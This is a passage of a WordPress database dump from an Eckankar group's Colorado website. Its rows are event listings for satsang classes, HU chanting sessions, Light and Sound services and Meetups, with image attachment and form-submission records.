personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online ECK Satsang Class<br>\'The Master 3 Discourses\'','','publish','closed','closed','','554','','','2021-11-09 16:31:40','2021-11-09 23:31:40','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265918',0,'mec-events','',0),(265919,2,'2021-11-09 15:14:33','2021-11-09 22:14:33','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"color: #484848;\"><strong><span style=\"font-size: 18pt;\">- This Class Is Available To Members Of Eckankar-</span><br>\r\n</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.<br>\r\n<br>\r\n</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Satsang Class TEMPLATE | Title Goes Here','','draft','closed','closed','','','','','2023-08-27 11:23:07','2023-08-27 17:23:07','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265919',0,'mec-events','',0),(265920,2,'2021-11-09 16:25:42','2021-11-09 23:25:42','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 18pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Temple Hybrid-Online & In Person ECK Satsang Class<br>\'The Master 2 Discourses\'','','publish','closed','closed','','temple-hybrid-online-in-person-eck-satsang-classthe-master-2-discourses','','','2021-11-09 16:25:42','2021-11-09 23:25:42','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265920',0,'mec-events','',0),(265922,2,'2021-11-09 16:35:25','2021-11-09 23:35:25','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 18pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Temple Hybrid-Online & In Person ECK Satsang Class<br>\'The Master 4 Discourses\'','','publish','closed','closed','','temple-hybrid-online-in-person-eck-satsang-classthe-master-4-discourses','','','2021-11-09 16:35:25','2021-11-09 23:35:25','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265922',0,'mec-events','',0),(265929,0,'2021-11-13 10:31:09','2021-11-13 17:31:09','','','','publish','closed','closed','','265929','','','2021-11-13 10:31:09','2021-11-13 17:31:09','',0,'https://eckankar-colorado.org/nf_sub/265929/',0,'nf_sub','',0),(265930,2,'2021-11-14 10:03:30','2021-11-14 17:03:30','','RESA Org Chart 10.01.21','','inherit','closed','closed','','resa-org-chart-10-01-21','','','2021-11-14 10:03:30','2021-11-14 17:03:30','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/11/RESA-Org-Chart-10.01.21.pdf',0,'attachment','application/pdf',0),(268800,2,'2023-07-18 10:02:50','2023-07-18 16:02:50','','RESA Org Chart 5.13.23','','inherit','closed','closed','','resa-org-chart-5-13-23','','','2023-07-18 10:02:50','2023-07-18 16:02:50','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/07/RESA-Org-Chart-5.13.23.pdf',0,'attachment','application/pdf',0),(265939,2,'2021-11-15 13:33:47','2021-11-15 20:33:47','','podcast-bk-2','','inherit','closed','closed','','podcast-bk-2','','','2021-11-15 13:33:47','2021-11-15 20:33:47','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/11/podcast-bk-2.jpg',0,'attachment','image/jpeg',0),(265941,2,'2021-11-15 14:07:09','2021-11-15 21:07:09','','podcast-bk-4','','inherit','closed','closed','','podcast-bk-4','','','2021-11-15 14:07:09','2021-11-15 21:07:09','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/11/podcast-bk-4.jpg',0,'attachment','image/jpeg',0),(265944,2,'2021-11-16 13:11:53','2021-11-16 20:11:53','','podcast-bk-5','','inherit','closed','closed','','podcast-bk-5','','','2021-11-16 13:11:53','2021-11-16 20:11:53','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/11/podcast-bk-5.jpg',0,'attachment','image/jpeg',0),(265947,2,'2021-11-16 13:23:09','2021-11-16 20:23:09','','podcast-logo-1','','inherit','closed','closed','','podcast-logo-1','','','2021-11-16 13:23:09','2021-11-16 20:23:09','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/11/podcast-logo-1.png',0,'attachment','image/png',0),(265950,2,'2021-11-16 14:27:24','2021-11-16 21:27:24','','seminar-logo-2','','inherit','closed','closed','','seminar-logo-2','','','2021-11-16 14:27:24','2021-11-16 21:27:24','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/11/seminar-logo-2.png',0,'attachment','image/png',0),(265976,0,'2021-11-16 19:10:26','2021-11-17 02:10:26','','','','publish','closed','closed','','265976','','','2021-11-16 19:10:26','2021-11-17 02:10:26','',0,'https://eckankar-colorado.org/nf_sub/265976/',0,'nf_sub','',0),(265983,2,'2021-11-17 11:18:17','2021-11-17 18:18:17','','mic-5','','inherit','closed','closed','','mic-5','','','2021-11-17 11:18:17','2021-11-17 18:18:17','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/11/mic-5.jpg',0,'attachment','image/jpeg',0),(265988,2,'2021-11-17 11:42:46','2021-11-17 18:42:46','','esc-oct-sem-bk-1','','inherit','closed','closed','','esc-oct-sem-bk-1','','','2021-11-17 11:42:46','2021-11-17 18:42:46','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/11/esc-oct-sem-bk-1.jpg',0,'attachment','image/jpeg',0),(266026,0,'2021-11-21 10:33:16','2021-11-21 17:33:16','','','','publish','closed','closed','','266026','','','2021-11-21 10:33:16','2021-11-21 17:33:16','',0,'https://eckankar-colorado.org/nf_sub/266026/',0,'nf_sub','',0),(266027,0,'2021-11-21 12:02:24','2021-11-21 19:02:24','','','','publish','closed','closed','','266027','','','2021-11-21 12:02:24','2021-11-21 19:02:24','',0,'https://eckankar-colorado.org/nf_sub/266027/',0,'nf_sub','',0),(266028,0,'2021-11-21 18:57:44','2021-11-22 01:57:44','','','','publish','closed','closed','','266028','','','2021-11-21 18:57:44','2021-11-22 01:57:44','',0,'https://eckankar-colorado.org/nf_sub/266028/',0,'nf_sub','',0),(266035,2,'2021-11-24 10:28:52','2021-11-24 17:28:52','<p><strong><span style=\"font-size: 18pt;\">You\'re invited to experience chanting HU, a love song to God, contemplative time, and spiritual conversation with others of like heart.</span></strong><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">A divine sound courses through all life - through every blade of grass, every galaxy, every atom of our bodies. HU is an ancient, sacred name for God - a carrier of love between Soul and God. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. It is the clear Voice of God, with the power to transform the lead of the human consciousness into the gold of an enlightened Soul.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Find your own proof of the love and power of <strong>HU</strong>.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This event is sponsored by Eckankar, the Path of Spiritual Freedom as a community service.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">For more information about HU, check out <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">The Sound of Soul</a></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>**</strong> <em>Our current health regulations in Colorado do not require social distancing, face masks or vaccination to attend a large group activity; nor is Colorado Satsang requiring them. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n<!-- REGISTER BUTTON CODE --><!-- END REGISTER BUTTON CODE -->','Experience HU, The Sound of Soul -- IN-PERSON','','publish','closed','closed','','experience-hu-the-sound-of-soul-in-person','','','2021-11-24 10:37:39','2021-11-24 17:37:39','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266035',0,'mec-events','',0),(266036,2,'2021-11-24 10:20:58','2021-11-24 17:20:58','','hu-wooden-1','','inherit','closed','closed','','hu-wooden-1','','','2021-11-24 10:20:58','2021-11-24 17:20:58','',266035,'https://eckankar-colorado.org/wp-content/uploads/2021/11/hu-wooden-1.jpg',0,'attachment','image/jpeg',0),(266038,0,'2021-11-27 16:52:10','2021-11-27 23:52:10','','','','publish','closed','closed','','266038','','','2021-11-27 16:52:10','2021-11-27 23:52:10','',0,'https://eckankar-colorado.org/nf_sub/266038/',0,'nf_sub','',0),(266042,2,'2021-11-28 09:58:43','2021-11-28 16:58:43','<p><span style=\"font-size: 18pt;\"><strong>Have you ever thought that life might be trying to tell you something?</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Come join us to explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide, a specially trained member of the ECK clergy.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Enjoy listening or sharing your spiritual experiences, insights, and questions.</span></p>\r\n<p><span style=\"font-size: 14pt;\">All are welcome!</span></p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 12pt;\"><strong>**</strong> <em>Per Jefferson County requirements, face masks are required in all public indoor spaces for anyone over the age of 3 with the exception of individuals leading a religious service as long as they maintain a twelve-foot distance.  At our in-person events, Colorado Satsang Society will require face masks to be worn. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n<p>&nbsp;</p>','IN-PERSON - Roundtable Discussion<br>\'Life as the Master Teacher\'','','publish','closed','closed','','roundtable-in-personlife-as-the-master-teacher','','','2021-12-31 13:29:25','2021-12-31 20:29:25','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266042',0,'mec-events','',0),(266044,0,'2021-11-29 00:28:13','2021-11-29 07:28:13','','','','publish','closed','closed','','266044','','','2021-11-29 00:28:13','2021-11-29 07:28:13','',0,'https://eckankar-colorado.org/nf_sub/266044/',0,'nf_sub','',0),(266045,0,'2021-11-30 14:53:48','2021-11-30 21:53:48','','','','publish','closed','closed','','266045','','','2021-11-30 14:53:48','2021-11-30 21:53:48','',0,'https://eckankar-colorado.org/nf_sub/266045/',0,'nf_sub','',0),(266046,0,'2021-11-30 16:53:23','2021-11-30 23:53:23','','','','publish','closed','closed','','266046','','','2021-11-30 16:53:23','2021-11-30 23:53:23','',0,'https://eckankar-colorado.org/nf_sub/266046/',0,'nf_sub','',0),(266052,0,'2021-12-05 03:44:01','2021-12-05 10:44:01','','','','publish','closed','closed','','266052','','','2021-12-05 03:44:01','2021-12-05 10:44:01','',0,'https://eckankar-colorado.org/nf_sub/266052/',0,'nf_sub','',0),(266053,2,'2021-12-05 08:32:18','2021-12-05 15:32:18','<p><span style=\"font-size: 16pt;\"><strong>People of all faiths are warmly invited to the ECK Light and Sound Service.<br />\r\nEach service focuses on spiritual principles at work in our lives.</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\r\n<ul>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\r\n</ul>\r\n<p><span style=\"color: #666666;\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.</span> <!-- REGISTRATION SHORTCODE --></span></p>\r\n<p><span style=\"font-size: 14pt;\"><strong>For Zoom login information, just fill out the form below. Hope to see you there!</strong></span></p>\r\n<p>[ninja_form id=46]</p>\r\n<p>&nbsp;</p>','ONLINE - ECK Light and Sound Service<br>\'Relationships and God\'s Love\'','','publish','closed','closed','','eck-light-and-sound-service-onlinerelationships-and-gods-love','','','2021-12-05 08:48:23','2021-12-05 15:48:23','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266053',0,'mec-events','',0),(266055,2,'2021-12-05 08:45:51','2021-12-05 15:45:51','','','','publish','closed','closed','','266055','','','2021-12-05 08:45:51','2021-12-05 15:45:51','',0,'https://eckankar-colorado.org/nf_sub/266055/',0,'nf_sub','',0),(266056,2,'2021-12-05 10:25:38','2021-12-05 17:25:38','<p><strong><span style=\"font-size: 16pt;\">Have you wondered whether a living spiritual teacher and guide could help you on your unique road home to God?</span></strong></p>\r\n<p><strong><span style=\"font-size: 16pt;\">Would you like to learn more about the deeply profound benefits of working with a spiritual master?</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">If you answered yes to either question, this ECK Light and Sound Service will give you an overview of what working with a spiritual master can do for you. You will hear inspiring spiritual stories, experience the HU Chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Harold Klemp writes, \"In ECK, there is the principle of the Inner and Outer Master. The Outer Master is myself as the spiritual leader of Eckankar. But there is also an inner part, which we call the Inner Master, who gives spiritual instruction to each person as he or she needs it. In other words, each person is unique in how they look at life, because each person’s experiences have been totally unique.\"</span></p>\r\n<p><span style=\"font-size: 14pt;\">Welcome to All. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>***</strong><em>Per Jefferson County requirements, face masks are required in all public indoor spaces for anyone over the age of 3 with the exception of individuals leading a religious service as long as they maintain a twelve-foot distance. At our in-person events, Colorado Satsang Society will require face masks to be worn. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></span></p>','IN-PERSON - ECK Light and Sound Service<br>\'Having a Master Teacher for Life\'','','publish','open','closed','','in-person-eck-light-and-sound-servicehaving-a-master-teacher-for-life','','','2022-01-01 10:01:40','2022-01-01 17:01:40','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266056',0,'mec-events','',0),(266060,2,'2021-12-05 10:31:56','2021-12-05 17:31:56','','boy-birds-life-2','','inherit','closed','closed','','boy-birds-life-2','','','2021-12-05 10:31:56','2021-12-05 17:31:56','',266056,'https://eckankar-colorado.org/wp-content/uploads/2021/12/boy-birds-life-2.jpg',0,'attachment','image/jpeg',0),(266061,2,'2021-12-05 10:45:53','0000-00-00 00:00:00','<p><strong><span style=\"font-size: 18pt;\">You\'re invited to experience chanting HU, a love song to God, contemplative time, and spiritual conversation with others of like heart.</span></strong><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">A divine sound courses through all life - through every blade of grass, every galaxy, every atom of our bodies. HU is an ancient, sacred name for God - a carrier of love between Soul and God. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. It is the clear Voice of God, with the power to transform the lead of the human consciousness into the gold of an enlightened Soul.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Find your own proof of the love and power of <strong>HU</strong>.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This event is sponsored by Eckankar, the Path of Spiritual Freedom as a community service.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">For more information about HU, check out <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">The Sound of Soul</a></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>**</strong> <em>Our current health regulations in Colorado do not require social distancing, face masks or vaccination to attend a large group activity; nor is Colorado Satsang requiring them. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n<!-- REGISTER BUTTON CODE --><!-- END REGISTER BUTTON CODE -->','Experience HU, The Sound of Soul -- IN-PERSON','','draft','closed','closed','','','','','2021-12-05 10:45:53','0000-00-00 00:00:00','',0,'https://eckankar-colorado.org/?post_type=mec-events&p=266061',0,'mec-events','',0),(266062,2,'2021-12-05 10:56:07','2021-12-05 17:56:07','<p><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">In this ONLINE event, you will have the opportunity to experience some of the many benefits of singing HU:</span></strong></p>\r\n<ul>\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and discussion groups in Zoom breakout rooms, where you can participate in spiritual conversation with others of like heart. </span></p>\r\n<p><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">The Sound of Soul</a>.</span></p>\r\n<p><span style=\"color: #333333;\"><span style=\"font-size: 14pt;\"><strong><span style=\"color: #1d5791;\">For online login information, just fill out the form below. Hope to see you there!</span></strong></span></span></p>\r\n<p>[ninja_form id=44]</p>','ONLINE - Experience HU, The Sound of Soul','','publish','closed','closed','','online-experience-hu-the-sound-of-soul','','','2021-12-20 17:00:17','2021-12-21 00:00:17','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266062',0,'mec-events','',0),(266063,2,'2021-12-05 10:55:33','2021-12-05 17:55:33','','sunset-lightshine','','inherit','closed','closed','','sunset-lightshine','','','2023-08-02 10:50:21','2023-08-02 16:50:21','',266062,'https://eckankar-colorado.org/wp-content/uploads/2021/12/sunset-lightshine.jpg',0,'attachment','image/jpeg',0),(266067,2,'2021-12-07 11:14:22','2021-12-07 18:14:22','','hu-sos-bgrid-sized-2','','inherit','closed','closed','','hu-sos-bgrid-sized-2','','','2021-12-07 11:14:22','2021-12-07 18:14:22','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/12/hu-sos-bgrid-sized-2.png',0,'attachment','image/png',0),(266075,2,'2021-12-07 16:04:17','2021-12-07 23:04:17','','generic-event-6','','inherit','closed','closed','','generic-event-6','','','2021-12-07 16:04:17','2021-12-07 23:04:17','',265681,'https://eckankar-colorado.org/wp-content/uploads/2021/12/generic-event-6.jpg',0,'attachment','image/jpeg',0),(266076,2,'2021-12-07 16:06:37','2021-12-07 23:06:37','','generic-event-6','','inherit','closed','closed','','generic-event-6-2','','','2021-12-07 16:06:37','2021-12-07 23:06:37','',265681,'https://eckankar-colorado.org/wp-content/uploads/2021/12/generic-event-6-1.jpg',0,'attachment','image/jpeg',0),(266077,2,'2021-12-07 16:07:27','2021-12-07 23:07:27','','generic-event-6','','inherit','closed','closed','','generic-event-6-3','','','2021-12-07 16:07:27','2021-12-07 23:07:27','',265681,'https://eckankar-colorado.org/wp-content/uploads/2021/12/generic-event-6-2.jpg',0,'attachment','image/jpeg',0),(266078,2,'2021-12-09 14:11:56','2021-12-09 21:11:56','<p><strong><span style=\"font-size: 18pt;\">- Has a place you have never been felt amazingly familiar?</span></strong><br />\r\n<strong><span style=\"font-size: 18pt;\">- Can déjà vu or a dream prepare you for the future?</span></strong><br />\r\n<strong><span style=\"font-size: 18pt;\">- How does déjà vu connect to the joy in your life?</span></strong><br />\r\n<br />\r\n</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"font-size: 14pt; color: #666666;\">“The rule of destiny holds that people at some time will begin to awaken to who and what they are. A knowledge of past lives may also open them by way of dreams or déjà vu. A few catch a glimpse of future events.“<br />\r\n<br />\r\n“Déjà vu is the ability to know and see the past and understand the future.”<br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">-Quotes by  </span></span><span style=\"font-size: 12pt; color: #666666;\">—<a href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Harold Klemp</a></span></p>\r\n</blockquote>\r\n<p><span style=\"font-size: 14pt;\">A sense of déjà vu, a daydream or a night dream can heighten your perceptions and open a portal to a higher state of consciousness. Insights beyond the physical realm can provide an opening to knowledge of the future. Typically, the predictions are not for the country or planet, but insights that can be used in your daily life. A dream or déjà vu experience can allow time to prepare for an otherwise unexpected event. It can prepare one emotionally for an unexpected event. This higher state of awareness provides increased clarity and happiness for one who chooses to take the journey.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">You are invited to participate in a discussion with spiritual explorers who are gaining understand their past, present, and future. Learn how to experience life with a higher degree of perception, happiness, and mental clarity.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">You will have the opportunity to listen to or chant HU a love song to God. HU is an undirected prayer that can act as a tuning fork and open your consciousness to the message the Holy Spirit has for you. HU is not meant to change your current beliefs but to enhance them.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span><br />\r\n<br />\r\n<a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/282533789/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup<br>\'Déjà Vu: Have I Been Here Before?\'','','publish','closed','closed','','online-meetupdeja-vu-have-i-been-here-before','','','2021-12-09 16:07:35','2021-12-09 23:07:35','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266078',0,'mec-events','',0),(266079,2,'2021-12-09 14:10:34','2021-12-09 21:10:34','','greek-ruin-1','','inherit','closed','closed','','greek-ruin-1','','','2021-12-09 14:10:34','2021-12-09 21:10:34','',266078,'https://eckankar-colorado.org/wp-content/uploads/2021/12/greek-ruin-1.jpg',0,'attachment','image/jpeg',0),(266081,2,'2021-12-09 14:31:51','2021-12-09 21:31:51','<p><strong><span style=\"font-size: 16pt;\">Do you have natural talents and wonder where they came from?</span></strong><br />\r\n<strong><span style=\"font-size: 16pt;\">Do you have strong likes, dislikes, or unexplained fears?</span></strong><br />\r\n<strong><span style=\"font-size: 16pt;\">Are you especially attracted to certain countries or periods of history?</span></strong></p>\r\n<p><br />\r\n<span style=\"font-size: 14pt;\">If you are ready to explore your past and see what lessons it holds for you today, then this Meetup is for you.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">You Have Lived Before. Past lives helped you get where you are today. Your job, your family, your virtues, and shortcomings all have roots in distant landscapes. Unlocking memories and lessons can help you sort through problems and move ahead with confidence.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Harold Klemp says in his book Past Lives, Dreams, and Soul Travel, “<em>Soul is immortal. It has no beginning or end. It (you) exist because of God’s love for It, which is the whole philosophy of Eckankar in a nutshell. Our mistakes in this and past lifetimes are the polishing of a precious gem in the rough.</em>”</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">All are welcome.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">The Sound of Soul</a>.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/282588416/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup<br>\'12 Gifts of Spiritual Living: Past Lives, Present Lessons\'','','publish','closed','closed','','online-meetup12-gifts-of-spiritual-living-past-lives-present-lessons','','','2021-12-09 14:37:16','2021-12-09 21:37:16','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266081',0,'mec-events','',0),(266083,2,'2021-12-09 14:36:53','2021-12-09 21:36:53','','machu-pichu-2','','inherit','closed','closed','','machu-pichu-2','','','2021-12-09 14:36:53','2021-12-09 21:36:53','',266081,'https://eckankar-colorado.org/wp-content/uploads/2021/12/machu-pichu-2.jpg',0,'attachment','image/jpeg',0),(266084,2,'2021-12-09 16:04:20','2021-12-09 23:04:20','<p><strong><span style=\"font-size: 18pt;\">- Has a place you have never been felt amazingly familiar?</span></strong><br />\r\n<strong><span style=\"font-size: 18pt;\">- Can déjà vu or a dream prepare you for the future?</span></strong><br />\r\n<strong><span style=\"font-size: 18pt;\">- How does déjà vu connect to the joy in your life?</span></strong><br />\r\n<br />\r\n</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"font-size: 14pt; color: #666666;\">“The rule of destiny holds that people at some time will begin to awaken to who and what they are. A knowledge of past lives may also open them by way of dreams or déjà vu. A few catch a glimpse of future events.“<br />\r\n<br />\r\n“Déjà vu is the ability to know and see the past and understand the future.”<br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">-Quotes by  </span></span><span style=\"font-size: 12pt; color: #666666;\">—<a href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Harold Klemp</a></span></p>\r\n</blockquote>\r\n<p><span style=\"font-size: 14pt;\">A sense of déjà vu, a daydream or a night dream can heighten your perceptions and open a portal to a higher state of consciousness. Insights beyond the physical realm can provide an opening to knowledge of the future. Typically, the predictions are not for the country or planet, but insights that can be used in your daily life. A dream or déjà vu experience can allow time to prepare for an otherwise unexpected event. It can prepare one emotionally for an unexpected event. This higher state of awareness provides increased clarity and happiness for one who chooses to take the journey.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">You are invited to participate in a discussion with spiritual explorers who are gaining understand their past, present, and future. Learn how to experience life with a higher degree of perception, happiness, 